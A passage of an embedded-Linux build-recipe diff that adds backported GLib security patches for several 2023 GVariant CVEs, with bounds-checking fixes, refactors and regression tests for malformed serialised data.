++ return g_variant_new_int64 (GUINT64_SWAP_LE_BE (g_variant_get_int64 (value)));
++ else
++ return g_variant_new_int64 (g_variant_get_int64 (value));
+
+ case G_VARIANT_CLASS_UINT64:
+- return g_variant_new_uint64 (g_variant_get_uint64 (value));
++ if (byteswap)
++ return g_variant_new_uint64 (GUINT64_SWAP_LE_BE (g_variant_get_uint64 (value)));
++ else
++ return g_variant_new_uint64 (g_variant_get_uint64 (value));
+
+ case G_VARIANT_CLASS_HANDLE:
+- return g_variant_new_handle (g_variant_get_handle (value));
++ if (byteswap)
++ return g_variant_new_handle (GUINT32_SWAP_LE_BE (g_variant_get_handle (value)));
++ else
++ return g_variant_new_handle (g_variant_get_handle (value));
+
+ case G_VARIANT_CLASS_DOUBLE:
+- return g_variant_new_double (g_variant_get_double (value));
++ if (byteswap)
++ {
++ /* We have to convert the double to a uint64 here using a union,
++ * because a cast will round it numerically. */
++ union
++ {
++ guint64 u64;
++ gdouble dbl;
++ } u1, u2;
++ u1.dbl = g_variant_get_double (value);
++ u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);
++ return g_variant_new_double (u2.dbl);
++ }
++ else
++ return g_variant_new_double (g_variant_get_double (value));
+
+ case G_VARIANT_CLASS_STRING:
+ return g_variant_new_string (g_variant_get_string (value, NULL));
+@@ -5896,7 +5932,7 @@ g_variant_get_normal_form (GVariant *value)
+ if (g_variant_is_normal_form (value))
+ return g_variant_ref (value);
+
+- trusted = g_variant_deep_copy (value);
++ trusted = g_variant_deep_copy (value, FALSE);
+ g_assert (g_variant_is_trusted (trusted));
+
+ return g_variant_ref_sink (trusted);
+@@ -5916,6 +5952,11 @@ g_variant_get_normal_form (GVariant *value)
+ * contain multi-byte numeric data. That include strings, booleans,
+ * bytes and containers containing only these things (recursively).
+ *
++ * While this function can safely handle untrusted, non-normal data, it is
++ * recommended to check whether the input is in normal form beforehand, using
++ * g_variant_is_normal_form(), and to reject non-normal inputs if your
++ * application can be strict about what inputs it rejects.
++ *
+ * The returned value is always in normal form and is marked as trusted.
+ *
+ * Returns: (transfer full): the byteswapped form of @value
+@@ -5933,21 +5974,20 @@ g_variant_byteswap (GVariant *value)
+
+ g_variant_type_info_query (type_info, &alignment, NULL);
+
+- if (alignment)
+- /* (potentially) contains multi-byte numeric data */
++ if (alignment && g_variant_is_normal_form (value))
+ {
++ /* (potentially) contains multi-byte numeric data, but is also already in
++ * normal form so we can use a faster byteswapping codepath on the
++ * serialised data */
+ GVariantSerialised serialised = { 0, };
+- GVariant *trusted;
+ GBytes *bytes;
+
+- trusted = g_variant_get_normal_form (value);
+- serialised.type_info = g_variant_get_type_info (trusted);
+- serialised.size = g_variant_get_size (trusted);
++ serialised.type_info = g_variant_get_type_info (value);
++ serialised.size = g_variant_get_size (value);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ serialised.checked_offsets_up_to = G_MAXSIZE;
+- g_variant_store (trusted, serialised.data);
+- g_variant_unref (trusted);
++ g_variant_store (value, serialised.data);
+
+ g_variant_serialised_byteswap (serialised);
+
+@@ -5955,6 +5995,9 @@ g_variant_byteswap (GVariant *value)
+ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
++ else if (alignment)
++ /* (potentially) contains multi-byte numeric data */
++ new = g_variant_ref_sink (g_variant_deep_copy (value, TRUE));
+ else
+ /* contains no multi-byte data */
+ new = g_variant_get_normal_form (value);
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 3dda08e..679dd40 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -2284,24 +2284,67 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one = { 0, }, two = { 0, };
++ GVariantSerialised one = { 0, }, two = { 0, }, three = { 0, };
+ TreeInstance *tree;
+-
++ GVariant *one_variant = NULL;
++ GVariant *two_variant = NULL;
++ GVariant *two_byteswapped = NULL;
++ GVariant *three_variant = NULL;
++ GVariant *three_byteswapped = NULL;
++ guint8 *three_data_copy = NULL;
++ gsize three_size_copy = 0;
++
++ /* Write a tree out twice, once normally and once byteswapped. */
+ tree = tree_instance_new (NULL, 3);
+ serialise_tree (tree, &one);
+
++ one_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (one.type_info)),
++ one.data, one.size, FALSE, NULL, NULL);
++
+ i_am_writing_byteswapped = TRUE;
+ serialise_tree (tree, &two);
++ serialise_tree (tree, &three);
+ i_am_writing_byteswapped = FALSE;
+
+- g_variant_serialised_byteswap (two);
+-
+- g_assert_cmpmem (one.data, one.size, two.data, two.size);
+- g_assert_cmpuint (one.depth, ==, two.depth);
+-
++ /* Swap the first byteswapped one back using the function we want to test. */
++ two_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (two.type_info)),
++ two.data, two.size, FALSE, NULL, NULL);
++ two_byteswapped = g_variant_byteswap (two_variant);
++
++ /* Make the second byteswapped one non-normal (hopefully), and then byteswap
++ * it back using the function we want to test in its non-normal mode.
++ * This might not work because it’s not necessarily possible to make an
++ * arbitrary random variant non-normal. Adding a single zero byte to the end
++ * often makes something non-normal but still readable. */
++ three_size_copy = three.size + 1;
++ three_data_copy = g_malloc (three_size_copy);
++ memcpy (three_data_copy, three.data, three.size);
++ three_data_copy[three.size] = '\0';
++
++ three_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (three.type_info)),
++ three_data_copy, three_size_copy, FALSE, NULL, NULL);
++ three_byteswapped = g_variant_byteswap (three_variant);
++
++ /* Check they’re the same. We can always compare @one_variant and
++ * @two_byteswapped. We can only compare @two_byteswapped and
++ * @three_byteswapped if @two_variant and @three_variant are equal: in that
++ * case, the corruption to @three_variant was enough to make it non-normal but
++ * not enough to change its value. */
++ g_assert_cmpvariant (one_variant, two_byteswapped);
++
++ if (g_variant_equal (two_variant, three_variant))
++ g_assert_cmpvariant (two_byteswapped, three_byteswapped);
++
++ g_variant_unref (three_byteswapped);
++ g_variant_unref (three_variant);
++ g_variant_unref (two_byteswapped);
++ g_variant_unref (two_variant);
++ g_variant_unref (one_variant);
+ tree_instance_free (tree);
+ g_free (one.data);
+ g_free (two.data);
++ g_free (three.data);
++ g_free (three_data_copy);
+ }
+
+ static void
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
new file mode 100644
index 0000000000..533142b22a
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
@@ -0,0 +1,49 @@
+From 21a204147b16539b3eda3143b32844c49e29f4d4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:33:49 +0000
+Subject: [PATCH] gvariant: Propagate trust when getting a child of a
+ serialised variant
+
+If a variant is trusted, that means all its children are trusted, so
+ensure that their checked offsets are set as such.
+
+This allows a lot of the offset table checks to be avoided when getting
+children from trusted serialised tuples, which speeds things up.
+
+No unit test is included because this is just a performance fix. If
+there are other slownesses, or regressions, in serialised `GVariant`
+performance, the fuzzing setup will catch them like it did this one.
+
+This change does reduce the time to run the oss-fuzz reproducer from 80s
+to about 0.7s on my machine.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2841
+oss-fuzz#54314
+
+CVE: CVE-2023-32636
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/21a204147b16539b3eda3143b32844c49e29f4d4]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 1b9d5cc..ed57c70 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1173,8 +1173,8 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+- child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+- child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
++ child->contents.serialised.ordered_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.checked_offsets_up_to;
+
+ return child;
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
new file mode 100644
index 0000000000..9c0867bf5f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
@@ -0,0 +1,154 @@
+From 78da5faccb3e065116b75b3ff87ff55381da6c76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:24:43 +0000
+Subject: [PATCH] gvariant: Check offset table doesn't fall outside variant
+ bounds
+
+When dereferencing the first entry in the offset table for a tuple,
+check that it doesn’t fall outside the bounds of the variant first.
+
+This prevents an out-of-bounds read from some non-normal tuples.
+
+This bug was introduced in commit 73d0aa81c2575a5c9ae77d.
+
+Includes a unit test, although the test will likely only catch the
+original bug if run with asan enabled.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2840
+oss-fuzz#54302
+
+CVE: CVE-2023-32643
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/78da5faccb3e065116b75b3ff87ff55381da6c76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 12 ++++++--
+ glib/tests/gvariant.c | 63 ++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 72 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 5aa2cbc..4e50ed7 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -979,7 +979,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+
+ member_info = g_variant_type_info_member_info (value.type_info, index_);
+
+- if (member_info->i + 1)
++ if (member_info->i + 1 &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_start = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 1),
+ offset_size);
+@@ -990,7 +991,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_start &= member_info->b;
+ member_start |= member_info->c;
+
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_end = value.size - offset_size * (member_info->i + 1);
+
+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+@@ -1001,11 +1003,15 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_end = member_start + fixed_size;
+ }
+
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
++ offset_size * (member_info->i + 2) <= value.size)
+ member_end = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 2),
+ offset_size);
+
++ else /* invalid */
++ member_end = G_MAXSIZE;
++
+ if (out_member_start != NULL)
+ *out_member_start = member_start;
+ if (out_member_end != NULL)
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 679dd40..2eca8be 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5432,6 +5432,67 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that dereferencing the first element in the offset
++ * table doesn’t dereference memory before the start of the GVariant. The first
++ * element in the offset table gives the offset of the final member in the
++ * tuple (the offset table is stored in reverse), and the position of this final
++ * member is needed to check that none of the tuple members overlap with the
++ * offset table
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2840 */
++static void
++test_normal_checking_tuple_offsets5 (void)
++{
++ /* A tuple of type (sss) in normal form would have an offset table with two
++ * entries:
++ * - The first entry (lowest index in the table) gives the offset of the
++ * third `s` in the tuple, as the offset table is reversed compared to the
++ * tuple members.
++ * - The second entry (highest index in the table) gives the offset of the
++ * second `s` in the tuple.
++ * - The offset of the first `s` in the tuple is always 0.
++ *
++ * See §2.5.4 (Structures) of the GVariant specification for details, noting
++ * that the table is only layed out this way because all three members of the
++ * tuple have non-fixed sizes.
++ *
++ * It’s not clear whether the 0xaa data of this variant is part of the strings
++ * in the tuple, or part of the offset table. It doesn’t really matter. This
++ * is a regression test to check that the code to validate the offset table
++ * doesn’t unconditionally try to access the first entry in the offset table
++ * by subtracting the table size from the end of the GVariant data.
++ *
++ * In this non-normal case, that would result in an address off the start of
++ * the GVariant data, and an out-of-bounds read, because the GVariant is one
++ * byte long, but the offset table is calculated as two bytes long (with 1B
++ * sized entries) from the tuple’s type.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(sss)");
++ const guint8 data[] = { 0xaa };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2840");
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++
++ expected = g_variant_new_parsed ("('', '', '')");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an otherwise-valid serialised GVariant is considered non-normal if
+ * its offset table entries are too wide.
+ *
+@@ -5680,6 +5741,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets5",
++ test_normal_checking_tuple_offsets5);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
+ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
new file mode 100644
index 0000000000..9fc58341cb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
@@ -0,0 +1,103 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 49 ++++++++++++++++++++++----------------------
+ 1 file changed, 25 insertions(+), 24 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9397573..aa0e0a0 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -349,6 +349,27 @@ g_variant_ensure_size (GVariant *value)
+ }
+ }
+
++/* < private >
++ * g_variant_to_serialised:
++ * @value: a #GVariant
++ *
++ * Gets a GVariantSerialised for a GVariant in state STATE_SERIALISED.
++ */
++inline static GVariantSerialised
++g_variant_to_serialised (GVariant *value)
++{
++ g_assert (value->state & STATE_SERIALISED);
++ {
++ GVariantSerialised serialised = {
++ value->type_info,
++ (gpointer) value->contents.serialised.data,
++ value->size,
++ value->depth,
++ };
++ return serialised;
++ }
++}
++
+ /* < private >
+ * g_variant_serialise:
+ * @value: a #GVariant
+@@ -991,16 +1012,8 @@ g_variant_n_children (GVariant *value)
+ g_variant_lock (value);
+
+ if (value->state & STATE_SERIALISED)
+- {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
+-
+- n_children = g_variant_serialised_n_children (serialised);
+- }
++ n_children = g_variant_serialised_n_children (
++ g_variant_to_serialised (value));
+ else
+ n_children = value->contents.tree.n_children;
+
+@@ -1061,12 +1074,7 @@ g_variant_get_child_value (GVariant *value,
+ }
+
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
++ GVariantSerialised serialised = g_variant_to_serialised (value);
+ GVariantSerialised s_child;
+ GVariant *child;
+
+@@ -1179,14 +1187,7 @@ g_variant_is_normal_form (GVariant *value)
+
+ if (value->state & STATE_SERIALISED)
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth
+- };
+-
+- if (g_variant_serialised_is_normal (serialised))
++ if (g_variant_serialised_is_normal (g_variant_to_serialised (value)))
+ value->state |= STATE_TRUSTED;
+ }
+ else
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
new file mode 100644
index 0000000000..0e96b8d457
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
@@ -0,0 +1,210 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 108 +++++++++++++++++++------------------
+ 1 file changed, 57 insertions(+), 51 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 83e9d85..c7c2114 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -633,30 +633,62 @@ gvs_calculate_total_size (gsize body_size,
+ return body_size + 8 * offsets;
+ }
+
++struct Offsets
++{
++ gsize data_size;
++
++ guchar *array;
++ gsize length;
++ guint offset_size;
++
++ gboolean is_normal;
++};
++
+ static gsize
+-gvs_variable_sized_array_n_children (GVariantSerialised value)
++gvs_offsets_get_offset_n (struct Offsets *offsets,
++ gsize n)
++{
++ return gvs_read_unaligned_le (
++ offsets->array + (offsets->offset_size * n), offsets->offset_size);
++}
++
++static struct Offsets
++gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ {
++ struct Offsets out = { 0, };
+ gsize offsets_array_size;
+- gsize offset_size;
+ gsize last_end;
+
+ if (value.size == 0)
+- return 0;
+-
+- offset_size = gvs_get_offset_size (value.size);
++ {
++ out.is_normal = TRUE;
++ return out;
++ }
+
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ out.offset_size = gvs_get_offset_size (value.size);
++ last_end = gvs_read_unaligned_le (value.data + value.size - out.offset_size,
++ out.offset_size);
+
+ if (last_end > value.size)
+- return 0;
++ return out; /* offsets not normal */
+
+ offsets_array_size = value.size - last_end;
+
+- if (offsets_array_size % offset_size)
+- return 0;
++ if (offsets_array_size % out.offset_size)
++ return out; /* offsets not normal */
++
++ out.data_size = last_end;
++ out.array = value.data + last_end;
++ out.length = offsets_array_size / out.offset_size;
++ out.is_normal = TRUE;
+
+- return offsets_array_size / offset_size;
++ return out;
++}
++
++static gsize
++gvs_variable_sized_array_n_children (GVariantSerialised value)
++{
++ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
+ static GVariantSerialised
+@@ -664,8 +696,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offset_size;
+- gsize last_end;
++
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
++
+ gsize start;
+ gsize end;
+
+@@ -673,18 +706,11 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
+- offset_size = gvs_get_offset_size (value.size);
+-
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
+-
+ if (index_ > 0)
+ {
+ guint alignment;
+
+- start = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * (index_ - 1)),
+- offset_size);
++ start = gvs_offsets_get_offset_n (&offsets, index_ - 1);
+
+ g_variant_type_info_query (child.type_info, &alignment, NULL);
+ start += (-start) & alignment;
+@@ -692,11 +718,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ else
+ start = 0;
+
+- end = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * index_),
+- offset_size);
++ end = gvs_offsets_get_offset_n (&offsets, index_);
+
+- if (start < end && end <= value.size && end <= last_end)
++ if (start < end && end <= value.size && end <= offsets.data_size)
+ {
+ child.data = value.data + start;
+ child.size = end - start;
+@@ -768,34 +792,16 @@ static gboolean
+ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offsets_array_size;
+- guchar *offsets_array;
+- guint offset_size;
+ guint alignment;
+- gsize last_end;
+- gsize length;
+ gsize offset;
+ gsize i;
+
+- if (value.size == 0)
+- return TRUE;
+-
+- offset_size = gvs_get_offset_size (value.size);
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
+
+- if (last_end > value.size)
++ if (!offsets.is_normal)
+ return FALSE;
+
+- offsets_array_size = value.size - last_end;
+-
+- if (offsets_array_size % offset_size)
+- return FALSE;
+-
+- offsets_array = value.data + value.size - offsets_array_size;
+- length = offsets_array_size / offset_size;
+-
+- if (length == 0)
++ if (value.size != 0 && offsets.length == 0)
+ return FALSE;
+
+ child.type_info = g_variant_type_info_element (value.type_info);
+@@ -803,14 +809,14 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ child.depth = value.depth + 1;
+ offset = 0;
+
+- for (i = 0; i < length; i++)
++ for (i = 0; i < offsets.length; i++)
+ {
+ gsize this_end;
+
+- this_end = gvs_read_unaligned_le (offsets_array + offset_size * i,
+- offset_size);
++ this_end = gvs_read_unaligned_le (offsets.array + offsets.offset_size * i,
++ offsets.offset_size);
+
+- if (this_end < offset || this_end > last_end)
++ if (this_end < offset || this_end > offsets.data_size)
+ return FALSE;
+
+ while (offset & alignment)
+@@ -832,7 +838,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ offset = this_end;
+ }
+
+- g_assert (offset == last_end);
++ g_assert (offset == offsets.data_size);
+
+ return TRUE;
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
new file mode 100644
index 0000000000..e361cc7aad
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
@@ -0,0 +1,417 @@
+From ade71fb544391b2e33e1859645726bfee0d5eaaf Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 16 Aug 2023 03:12:21 +0000
+Subject: [PATCH] gvariant: Don't allow child elements to overlap with each
+ other
+
+If different elements of a variable sized array can overlap with each
+other then we can cause a `GVariant` to normalise to a much larger type.
+
+This commit changes the behaviour of `GVariant` with non-normal form data. If
+an invalid frame offset is found all subsequent elements are given their
+default value.
+
+When retrieving an element at index `n` we scan the frame offsets up to index
+`n` and if they are not in order we return an element with the default value
+for that type. This guarantees that elements don't overlap with each
+other. We remember the offset we've scanned up to so we don't need to
+repeat this work on subsequent accesses. We skip these checks for trusted
+data.
+
+Unfortunately this makes random access of untrusted data O(n) — at least
+on first access. It doesn't affect the algorithmic complexity of accessing
+elements in order, such as when using the `GVariantIter` interface. Also:
+the cost of validation will be amortised as the `GVariant` instance is
+continued to be used.
+
+I've implemented this with 4 different functions, 1 for each element size,
+rather than looping calling `gvs_read_unaligned_le` in the hope that the
+compiler will find it easy to optimise and should produce fairly tight
+code.
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/ade71fb544391b2e33e1859645726bfee0d5eaaf]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 35 ++++++++++++++++
+ glib/gvariant-serialiser.c | 86 ++++++++++++++++++++++++++++++++++++--
+ glib/gvariant-serialiser.h | 8 ++++
+ glib/tests/gvariant.c | 45 ++++++++++++++++++++
+ 4 files changed, 171 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index aa0e0a0..9b51e15 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -65,6 +65,7 @@ struct _GVariant
+ {
+ GBytes *bytes;
+ gconstpointer data;
++ gsize ordered_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -162,6 +163,24 @@ struct _GVariant
+ * if .data pointed to the appropriate number of nul
+ * bytes.
+ *
++ * .ordered_offsets_up_to: If ordered_offsets_up_to == n this means that all
++ * the frame offsets up to and including the frame
++ * offset determining the end of element n are in
++ * order. This guarantees that the bytes of element
++ * n don't overlap with any previous element.
++ *
++ * For trusted data this is set to G_MAXSIZE and we
++ * don't check that the frame offsets are in order.
++ *
++ * Note: This doesn't imply the offsets are good in
++ * any way apart from their ordering. In particular
++ * offsets may be out of bounds for this value or
++ * may imply that the data overlaps the frame
++ * offsets themselves.
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -365,6 +384,7 @@ g_variant_to_serialised (GVariant *value)
+ (gpointer) value->contents.serialised.data,
+ value->size,
+ value->depth,
++ value->contents.serialised.ordered_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -396,6 +416,7 @@ g_variant_serialise (GVariant *value,
+ serialised.size = value->size;
+ serialised.data = data;
+ serialised.depth = value->depth;
++ serialised.ordered_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -439,6 +460,15 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ g_assert (serialised->size == value->size);
+ serialised->depth = value->depth;
+
++ if (value->state & STATE_SERIALISED)
++ {
++ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ }
++ else
++ {
++ serialised->ordered_offsets_up_to = 0;
++ }
++
+ if (serialised->data)
+ /* g_variant_store() is a public API, so it
+ * it will reacquire the lock if it needs to.
+@@ -481,6 +511,7 @@ g_variant_ensure_serialised (GVariant *value)
+ bytes = g_bytes_new_take (data, value->size);
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
++ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -561,6 +592,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.type_info = value->type_info;
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -610,6 +642,8 @@ g_variant_new_from_bytes (const GVariantType *type,
+ value->contents.serialised.data = g_bytes_get_data (bytes, &value->size);
+ }
+
++ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+ return value;
+@@ -1108,6 +1142,7 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
++ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index c7c2114..fe0b1a4 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2007, 2008 Ryan Lortie
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
